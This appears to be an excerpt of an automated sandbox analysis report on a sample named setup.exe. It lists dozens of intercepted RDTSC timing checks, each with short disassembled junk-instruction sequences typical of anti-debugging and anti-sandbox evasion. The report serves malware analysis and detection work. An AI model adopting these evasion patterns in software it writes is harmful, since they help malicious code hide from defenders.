                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A371 second address: 41A377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A377 second address: 41A37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A4E5 second address: 41A4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F47D8E48266h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41A4F5 second address: 41A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41AB34 second address: 41AB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F47D8E48266h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41B3CC second address: 41B3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41B998 second address: 41B99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41B99D second address: 41B9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41B9A3 second address: 41B9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41BC2A second address: 41BC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41BC30 second address: 41BC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41BC34 second address: 41BC62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jbe 00007F47D8E3B0A6h 0x00000014 ja 00007F47D8E3B0A6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 41BC62 second address: 41BC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42011D second address: 420133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420133 second address: 420142 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420142 second address: 42014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42014D second address: 420151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420151 second address: 420170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F47D8E3B0B6h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420170 second address: 420176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420176 second address: 42017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420538 second address: 42053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42067F second address: 420685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420685 second address: 42068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42068B second address: 420690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420690 second address: 420695 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420695 second address: 4206A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4206A0 second address: 4206CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48276h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 jc 00007F47D8E4826Eh 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420837 second address: 42084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42084F second address: 420854 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420854 second address: 420869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E3B0ACh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420869 second address: 420886 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E48266h 0x00000008 jc 00007F47D8E48266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 jns 00007F47D8E48266h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420886 second address: 420890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420890 second address: 4208A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4209D2 second address: 4209D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 420B0A second address: 420B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F47D8E48270h 0x0000000d ja 00007F47D8E48266h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42DC20 second address: 42DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F47D8E3B0B6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42DC3D second address: 42DC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42BD80 second address: 42BDE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F47D8E3B0ABh 0x0000000a jmp 00007F47D8E3B0B3h 0x0000000f popad 0x00000010 jmp 00007F47D8E3B0B5h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop ecx 0x0000001c je 00007F47D8E3B0BFh 0x00000022 jmp 00007F47D8E3B0B9h 0x00000027 jnc 00007F47D8E3B0AEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42BF58 second address: 42BF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42C542 second address: 42C557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F47D8E3B0AEh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42C557 second address: 42C573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42C879 second address: 42C87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42C87D second address: 42C885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42CC6A second address: 42CC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F47D8E3B0AEh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42D366 second address: 42D36B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 441BF2 second address: 441BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 378650 second address: 378654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4417BA second address: 4417BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4417BF second address: 4417C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 447087 second address: 44708B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 44708B second address: 4470AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48271h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F47D8E48268h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 446D19 second address: 446D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 446D1D second address: 446D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E48274h 0x0000000e jg 00007F47D8E48266h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 446D42 second address: 446D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 446D48 second address: 446D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F47D8E48266h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 44D5B2 second address: 44D5BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E3B0A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 453BDD second address: 453BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 453BE8 second address: 453BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 457668 second address: 457689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 457689 second address: 45768D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 459030 second address: 459036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 45C11F second address: 45C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46199C second address: 4619A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619A2 second address: 4619AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619AB second address: 4619B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619B1 second address: 4619B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619B5 second address: 4619C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47D8E48266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619C1 second address: 4619C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619C9 second address: 4619CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619CD second address: 4619D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619D7 second address: 4619DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4619DD second address: 4619E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 461C69 second address: 461C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnc 00007F47D8E48266h 0x0000000d jc 00007F47D8E48266h 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 461DD8 second address: 461DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B4h 0x0000000d ja 00007F47D8E3B0A6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4620DA second address: 462115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007F47D8E4826Fh 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f jp 00007F47D8E48266h 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e jne 00007F47D8E48268h 0x00000024 jnc 00007F47D8E48268h 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 462B69 second address: 462B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 465D07 second address: 465D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 465D12 second address: 465D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 465D18 second address: 465D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46588D second address: 4658A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46A967 second address: 46A989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a ja 00007F47D8E48266h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ah 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46A989 second address: 46A990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46A7FF second address: 46A81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F47D8E4826Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46BF46 second address: 46BF4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46BF4C second address: 46BF59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F47D8E48266h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4762FA second address: 47630C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47630C second address: 476312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 476312 second address: 47631A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47631A second address: 476340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48272h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F47D8E48266h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 476340 second address: 476346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 476346 second address: 47635A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jl 00007F47D8E48266h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 489018 second address: 48901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48901C second address: 489020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A20DF second address: 4A20EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A20EC second address: 4A20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A20F1 second address: 4A210D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c js 00007F47D8E3B0A6h 0x00000012 pop edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 36AF20 second address: 36AF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b jo 00007F47D8E4826Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A119A second address: 4A11D9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0C2h 0x00000008 jmp 00007F47D8E3B0B6h 0x0000000d jbe 00007F47D8E3B0A6h 0x00000013 jmp 00007F47D8E3B0B5h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A11D9 second address: 4A11DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
